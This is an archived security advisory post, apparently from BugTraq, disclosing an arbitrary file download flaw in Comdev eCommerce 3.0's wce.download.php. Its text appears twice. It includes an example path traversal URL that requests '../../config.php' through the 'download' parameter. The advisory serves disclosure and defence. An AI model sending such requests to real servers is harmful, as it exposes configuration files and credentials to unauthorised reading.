BugTraq
Back to list
|
Post reply
Comdev eCommerce wce.download.php Download Vulnerability
Aug 05 2005 01:55AM
none none com
Class: Input Validation Error
Vulnerable: Comdev Comdev eCommerce 3.0
The wce.download.php script (present in two locations) can be passed a "download" http request parameter to download an arbitrary file on the vulnerable server.
Example:
http://www.vulnerable.com/oneadmin/faqsupport/wce.download.php?download=
../../config.php
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
Vulnerable: Comdev Comdev eCommerce 3.0
The wce.download.php script (present in two locations) can be passed a "download" http request parameter to download an arbitrary file on the vulnerable server.
Example:
http://www.vulnerable.com/oneadmin/faqsupport/wce.download.php?download=
../../config.php
[ reply ]